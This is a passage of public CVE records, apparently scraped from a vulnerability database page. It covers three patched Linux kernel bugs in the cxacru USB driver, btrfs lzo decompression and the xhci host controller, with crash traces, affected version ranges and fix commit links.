cxacru_usb_probe+0xdf/0x1e0 drivers/usb/atm/cxacru.c:1363
usb_probe_interface+0x315/0x7f0 drivers/usb/core/driver.c:396
call_driver_probe drivers/base/dd.c:517 [inline]
really_probe+0x23c/0xcd0 drivers/base/dd.c:595
__driver_probe_device+0x338/0x4d0 drivers/base/dd.c:747
driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:777
__device_attach_driver+0x20b/0x2f0 drivers/base/dd.c:894
bus_for_each_drv+0x15f/0x1e0 drivers/base/bus.c:427
__device_attach+0x228/0x4a0 drivers/base/dd.c:965
bus_probe_device+0x1e4/0x290 drivers/base/bus.c:487
device_add+0xc2f/0x2180 drivers/base/core.c:3354
usb_set_configuration+0x113a/0x1910 drivers/usb/core/message.c:2170
usb_generic_driver_probe+0xba/0x100 drivers/usb/core/generic.c:238
usb_probe_device+0xd9/0x2c0 drivers/usb/core/driver.c:293
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: 902ffc3c707c1d459ea57428a619a807cbe412f9 Version: aef30a0bfdf6c10565285fff1ae8400b34ee0d81 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5159a81924311c1ec786ad9fdef784ead8676a6a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/23926d316d2836315cb113569f91393266eb5b47"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/75ddbf776dd04a09fb9e5267ead5d0c989f84506"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1aac4be1aaa5177506219f01dce5e29194e5e95a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5584c776a1af7807ca815ee6265f2c1429fc5727"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f536f09eb45e4de8d1b9accee9d992aa1846f1d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac9007520e392541a29daebaae8b9109007bc781"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2eabb655a968b862bc0c31629a09f0fbf3c80d51"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41097",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:18.903942Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:08.858Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/atm/cxacru.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5159a81924311c1ec786ad9fdef784ead8676a6a",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"lessThan": "23926d316d2836315cb113569f91393266eb5b47",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"lessThan": "75ddbf776dd04a09fb9e5267ead5d0c989f84506",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"lessThan": "1aac4be1aaa5177506219f01dce5e29194e5e95a",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"lessThan": "5584c776a1af7807ca815ee6265f2c1429fc5727",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"lessThan": "f536f09eb45e4de8d1b9accee9d992aa1846f1d4",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"lessThan": "ac9007520e392541a29daebaae8b9109007bc781",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"lessThan": "2eabb655a968b862bc0c31629a09f0fbf3c80d51",
"status": "affected",
"version": "902ffc3c707c1d459ea57428a619a807cbe412f9",
"versionType": "git"
},
{
"status": "affected",
"version": "aef30a0bfdf6c10565285fff1ae8400b34ee0d81",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/atm/cxacru.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.36"
},
{
"lessThan": "2.6.36",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "2.6.35.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: atm: cxacru: fix endpoint checking in cxacru_bind()\n\nSyzbot is still reporting quite an old issue [1] that occurs due to\nincomplete checking of present usb endpoints. As such, wrong\nendpoints types may be used at urb sumbitting stage which in turn\ntriggers a warning in usb_submit_urb().\n\nFix the issue by verifying that required endpoint types are present\nfor both in and out endpoints, taking into account cmd endpoint type.\n\nUnfortunately, this patch has not been tested on real hardware.\n\n[1] Syzbot report:\nusb 1-1: BOGUS urb xfer, pipe 1 != type 3\nWARNING: CPU: 0 PID: 8667 at drivers/usb/core/urb.c:502 usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502\nModules linked in:\nCPU: 0 PID: 8667 Comm: kworker/0:4 Not tainted 5.14.0-rc4-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\nWorkqueue: usb_hub_wq hub_event\nRIP: 0010:usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502\n...\nCall Trace:\n cxacru_cm+0x3c0/0x8e0 drivers/usb/atm/cxacru.c:649\n cxacru_card_status+0x22/0xd0 drivers/usb/atm/cxacru.c:760\n cxacru_bind+0x7ac/0x11a0 drivers/usb/atm/cxacru.c:1209\n usbatm_usb_probe+0x321/0x1ae0 drivers/usb/atm/usbatm.c:1055\n cxacru_usb_probe+0xdf/0x1e0 drivers/usb/atm/cxacru.c:1363\n usb_probe_interface+0x315/0x7f0 drivers/usb/core/driver.c:396\n call_driver_probe drivers/base/dd.c:517 [inline]\n really_probe+0x23c/0xcd0 drivers/base/dd.c:595\n __driver_probe_device+0x338/0x4d0 drivers/base/dd.c:747\n driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:777\n __device_attach_driver+0x20b/0x2f0 drivers/base/dd.c:894\n bus_for_each_drv+0x15f/0x1e0 drivers/base/bus.c:427\n __device_attach+0x228/0x4a0 drivers/base/dd.c:965\n bus_probe_device+0x1e4/0x290 drivers/base/bus.c:487\n device_add+0xc2f/0x2180 drivers/base/core.c:3354\n usb_set_configuration+0x113a/0x1910 drivers/usb/core/message.c:2170\n usb_generic_driver_probe+0xba/0x100 drivers/usb/core/generic.c:238\n usb_probe_device+0xd9/0x2c0 drivers/usb/core/driver.c:293"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:34.376Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5159a81924311c1ec786ad9fdef784ead8676a6a"
},
{
"url": "https://git.kernel.org/stable/c/23926d316d2836315cb113569f91393266eb5b47"
},
{
"url": "https://git.kernel.org/stable/c/75ddbf776dd04a09fb9e5267ead5d0c989f84506"
},
{
"url": "https://git.kernel.org/stable/c/1aac4be1aaa5177506219f01dce5e29194e5e95a"
},
{
"url": "https://git.kernel.org/stable/c/5584c776a1af7807ca815ee6265f2c1429fc5727"
},
{
"url": "https://git.kernel.org/stable/c/f536f09eb45e4de8d1b9accee9d992aa1846f1d4"
},
{
"url": "https://git.kernel.org/stable/c/ac9007520e392541a29daebaae8b9109007bc781"
},
{
"url": "https://git.kernel.org/stable/c/2eabb655a968b862bc0c31629a09f0fbf3c80d51"
}
],
"title": "usb: atm: cxacru: fix endpoint checking in cxacru_bind()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41097",
"datePublished": "2024-07-29T15:48:10.175Z",
"dateReserved": "2024-07-12T12:17:45.637Z",
"dateUpdated": "2025-05-04T12:57:34.376Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48923 (GCVE-0-2022-48923)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-21 08:44
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: prevent copying too big compressed lzo segment
Compressed length can be corrupted to be a lot larger than memory
we have allocated for buffer.
This will cause memcpy in copy_compressed_segment to write outside
of allocated memory.
This mostly results in stuck read syscall but sometimes when using
btrfs send can get #GP
kernel: general protection fault, probably for non-canonical address 0x841551d5c1000: 0000 [#1] PREEMPT SMP NOPTI
kernel: CPU: 17 PID: 264 Comm: kworker/u256:7 Tainted: P OE 5.17.0-rc2-1 #12
kernel: Workqueue: btrfs-endio btrfs_work_helper [btrfs]
kernel: RIP: 0010:lzo_decompress_bio (./include/linux/fortify-string.h:225 fs/btrfs/lzo.c:322 fs/btrfs/lzo.c:394) btrfs
Code starting with the faulting instruction
===========================================
0:* 48 8b 06 mov (%rsi),%rax <-- trapping instruction
3: 48 8d 79 08 lea 0x8(%rcx),%rdi
7: 48 83 e7 f8 and $0xfffffffffffffff8,%rdi
b: 48 89 01 mov %rax,(%rcx)
e: 44 89 f0 mov %r14d,%eax
11: 48 8b 54 06 f8 mov -0x8(%rsi,%rax,1),%rdx
kernel: RSP: 0018:ffffb110812efd50 EFLAGS: 00010212
kernel: RAX: 0000000000001000 RBX: 000000009ca264c8 RCX: ffff98996e6d8ff8
kernel: RDX: 0000000000000064 RSI: 000841551d5c1000 RDI: ffffffff9500435d
kernel: RBP: ffff989a3be856c0 R08: 0000000000000000 R09: 0000000000000000
kernel: R10: 0000000000000000 R11: 0000000000001000 R12: ffff98996e6d8000
kernel: R13: 0000000000000008 R14: 0000000000001000 R15: 000841551d5c1000
kernel: FS: 0000000000000000(0000) GS:ffff98a09d640000(0000) knlGS:0000000000000000
kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
kernel: CR2: 00001e9f984d9ea8 CR3: 000000014971a000 CR4: 00000000003506e0
kernel: Call Trace:
kernel: <TASK>
kernel: end_compressed_bio_read (fs/btrfs/compression.c:104 fs/btrfs/compression.c:1363 fs/btrfs/compression.c:323) btrfs
kernel: end_workqueue_fn (fs/btrfs/disk-io.c:1923) btrfs
kernel: btrfs_work_helper (fs/btrfs/async-thread.c:326) btrfs
kernel: process_one_work (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:212 ./include/trace/events/workqueue.h:108 kernel/workqueue.c:2312)
kernel: worker_thread (./include/linux/list.h:292 kernel/workqueue.c:2455)
kernel: ? process_one_work (kernel/workqueue.c:2397)
kernel: kthread (kernel/kthread.c:377)
kernel: ? kthread_complete_and_exit (kernel/kthread.c:332)
kernel: ret_from_fork (arch/x86/entry/entry_64.S:301)
kernel: </TASK>
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48923",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:22.056264Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:00.797Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/lzo.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8df508b7a44cd8110c726057cd28e8f8116885eb",
"status": "affected",
"version": "a6e66e6f8c1b685e11b778bef614480a9c1a5278",
"versionType": "git"
},
{
"lessThan": "e326bd06cdde46df952361456232022298281d16",
"status": "affected",
"version": "a6e66e6f8c1b685e11b778bef614480a9c1a5278",
"versionType": "git"
},
{
"lessThan": "741b23a970a79d5d3a1db2d64fa2c7b375a4febb",
"status": "affected",
"version": "a6e66e6f8c1b685e11b778bef614480a9c1a5278",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/lzo.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: prevent copying too big compressed lzo segment\n\nCompressed length can be corrupted to be a lot larger than memory\nwe have allocated for buffer.\nThis will cause memcpy in copy_compressed_segment to write outside\nof allocated memory.\n\nThis mostly results in stuck read syscall but sometimes when using\nbtrfs send can get #GP\n\n kernel: general protection fault, probably for non-canonical address 0x841551d5c1000: 0000 [#1] PREEMPT SMP NOPTI\n kernel: CPU: 17 PID: 264 Comm: kworker/u256:7 Tainted: P OE 5.17.0-rc2-1 #12\n kernel: Workqueue: btrfs-endio btrfs_work_helper [btrfs]\n kernel: RIP: 0010:lzo_decompress_bio (./include/linux/fortify-string.h:225 fs/btrfs/lzo.c:322 fs/btrfs/lzo.c:394) btrfs\n Code starting with the faulting instruction\n ===========================================\n 0:* 48 8b 06 mov (%rsi),%rax \u003c-- trapping instruction\n 3: 48 8d 79 08 lea 0x8(%rcx),%rdi\n 7: 48 83 e7 f8 and $0xfffffffffffffff8,%rdi\n b: 48 89 01 mov %rax,(%rcx)\n e: 44 89 f0 mov %r14d,%eax\n 11: 48 8b 54 06 f8 mov -0x8(%rsi,%rax,1),%rdx\n kernel: RSP: 0018:ffffb110812efd50 EFLAGS: 00010212\n kernel: RAX: 0000000000001000 RBX: 000000009ca264c8 RCX: ffff98996e6d8ff8\n kernel: RDX: 0000000000000064 RSI: 000841551d5c1000 RDI: ffffffff9500435d\n kernel: RBP: ffff989a3be856c0 R08: 0000000000000000 R09: 0000000000000000\n kernel: R10: 0000000000000000 R11: 0000000000001000 R12: ffff98996e6d8000\n kernel: R13: 0000000000000008 R14: 0000000000001000 R15: 000841551d5c1000\n kernel: FS: 0000000000000000(0000) GS:ffff98a09d640000(0000) knlGS:0000000000000000\n kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n kernel: CR2: 00001e9f984d9ea8 CR3: 000000014971a000 CR4: 00000000003506e0\n kernel: Call Trace:\n kernel: \u003cTASK\u003e\n kernel: end_compressed_bio_read (fs/btrfs/compression.c:104 fs/btrfs/compression.c:1363 fs/btrfs/compression.c:323) btrfs\n kernel: end_workqueue_fn (fs/btrfs/disk-io.c:1923) btrfs\n kernel: btrfs_work_helper (fs/btrfs/async-thread.c:326) btrfs\n kernel: process_one_work (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:212 ./include/trace/events/workqueue.h:108 kernel/workqueue.c:2312)\n kernel: worker_thread (./include/linux/list.h:292 kernel/workqueue.c:2455)\n kernel: ? process_one_work (kernel/workqueue.c:2397)\n kernel: kthread (kernel/kthread.c:377)\n kernel: ? kthread_complete_and_exit (kernel/kthread.c:332)\n kernel: ret_from_fork (arch/x86/entry/entry_64.S:301)\n kernel: \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:44:01.641Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8df508b7a44cd8110c726057cd28e8f8116885eb"
},
{
"url": "https://git.kernel.org/stable/c/e326bd06cdde46df952361456232022298281d16"
},
{
"url": "https://git.kernel.org/stable/c/741b23a970a79d5d3a1db2d64fa2c7b375a4febb"
}
],
"title": "btrfs: prevent copying too big compressed lzo segment",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48923",
"datePublished": "2024-08-22T01:32:58.084Z",
"dateReserved": "2024-08-21T06:06:23.296Z",
"dateUpdated": "2025-05-21T08:44:01.641Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52901 (GCVE-0-2023-52901)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: xhci: Check endpoint is valid before dereferencing it
When the host controller is not responding, all URBs queued to all
endpoints need to be killed. This can cause a kernel panic if we
dereference an invalid endpoint.
Fix this by using xhci_get_virt_ep() helper to find the endpoint and
checking if the endpoint is valid before dereferencing it.
[233311.853271] xhci-hcd xhci-hcd.1.auto: xHCI host controller not responding, assume dead
[233311.853393] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000e8
[233311.853964] pc : xhci_hc_died+0x10c/0x270
[233311.853971] lr : xhci_hc_died+0x1ac/0x270
[233311.854077] Call trace:
[233311.854085] xhci_hc_died+0x10c/0x270
[233311.854093] xhci_stop_endpoint_command_watchdog+0x100/0x1a4
[233311.854105] call_timer_fn+0x50/0x2d4
[233311.854112] expire_timers+0xac/0x2e4
[233311.854118] run_timer_softirq+0x300/0xabc
[233311.854127] __do_softirq+0x148/0x528
[233311.854135] irq_exit+0x194/0x1a8
[233311.854143] __handle_domain_irq+0x164/0x1d0
[233311.854149] gic_handle_irq.22273+0x10c/0x188
[233311.854156] el1_irq+0xfc/0x1a8
[233311.854175] lpm_cpuidle_enter+0x25c/0x418 [msm_pm]
[233311.854185] cpuidle_enter_state+0x1f0/0x764
[233311.854194] do_idle+0x594/0x6ac
[233311.854201] cpu_startup_entry+0x7c/0x80
[233311.854209] secondary_start_kernel+0x170/0x198
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 50e8725e7c429701e530439013f9681e1fa36b5d Version: 50e8725e7c429701e530439013f9681e1fa36b5d Version: 50e8725e7c429701e530439013f9681e1fa36b5d Version: 50e8725e7c429701e530439013f9681e1fa36b5d Version: 50e8725e7c429701e530439013f9681e1fa36b5d Version: 50e8725e7c429701e530439013f9681e1fa36b5d Version: 50e8725e7c429701e530439013f9681e1fa36b5d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52901",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:27.437210Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:14.673Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/host/xhci-ring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "375be2dd61a072f7b1cac9b17eea59e07b58db3a",
"status": "affected",
"version": "50e8725e7c429701e530439013f9681e1fa36b5d",
"versionType": "git"
},
{
"lessThan": "2d2820d5f375563690c96e60676855205abfb7f5",
"status": "affected",
"version": "50e8725e7c429701e530439013f9681e1fa36b5d",
"versionType": "git"
},
{
"lessThan": "9891e5c73cab3fd9ed532dc50e9799e55e974766",
"status": "affected",
"version": "50e8725e7c429701e530439013f9681e1fa36b5d",
"versionType": "git"
},
{
"lessThan": "66fc1600855c05c4ba4e997184c91cf298e0405c",
"status": "affected",
"version": "50e8725e7c429701e530439013f9681e1fa36b5d",
"versionType": "git"
},
{
"lessThan": "f39c813af0b64f44af94e435c07bfa1ddc2575f5",
"status": "affected",
"version": "50e8725e7c429701e530439013f9681e1fa36b5d",
"versionType": "git"
},
{
"lessThan": "08864dc14a6803f0377ca77b9740b26db30c020f",
"status": "affected",
"version": "50e8725e7c429701e530439013f9681e1fa36b5d",
"versionType": "git"
},
{
"lessThan": "e8fb5bc76eb86437ab87002d4a36d6da02165654",
"status": "affected",
"version": "50e8725e7c429701e530439013f9681e1fa36b5d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/host/xhci-ring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.15"
},
{
"lessThan": "3.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.304",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.271",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "3.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Check endpoint is valid before dereferencing it\n\nWhen the host controller is not responding, all URBs queued to all\nendpoints need to be killed. This can cause a kernel panic if we\ndereference an invalid endpoint.\n\nFix this by using xhci_get_virt_ep() helper to find the endpoint and\nchecking if the endpoint is valid before dereferencing it.\n\n[233311.853271] xhci-hcd xhci-hcd.1.auto: xHCI host controller not responding, assume dead\n[233311.853393] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000e8\n\n[233311.853964] pc : xhci_hc_died+0x10c/0x270\n[233311.853971] lr : xhci_hc_died+0x1ac/0x270\n\n[233311.854077] Call trace:\n[233311.854085] xhci_hc_died+0x10c/0x270\n[233311.854093] xhci_stop_endpoint_command_watchdog+0x100/0x1a4\n[233311.854105] call_timer_fn+0x50/0x2d4\n[233311.854112] expire_timers+0xac/0x2e4\n[233311.854118] run_timer_softirq+0x300/0xabc\n[233311.854127] __do_softirq+0x148/0x528\n[233311.854135] irq_exit+0x194/0x1a8\n[233311.854143] __handle_domain_irq+0x164/0x1d0\n[233311.854149] gic_handle_irq.22273+0x10c/0x188\n[233311.854156] el1_irq+0xfc/0x1a8\n[233311.854175] lpm_cpuidle_enter+0x25c/0x418 [msm_pm]\n[233311.854185] cpuidle_enter_state+0x1f0/0x764\n[233311.854194] do_idle+0x594/0x6ac\n[233311.854201] cpu_startup_entry+0x7c/0x80\n[233311.854209] secondary_start_kernel+0x170/0x198"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:40.190Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
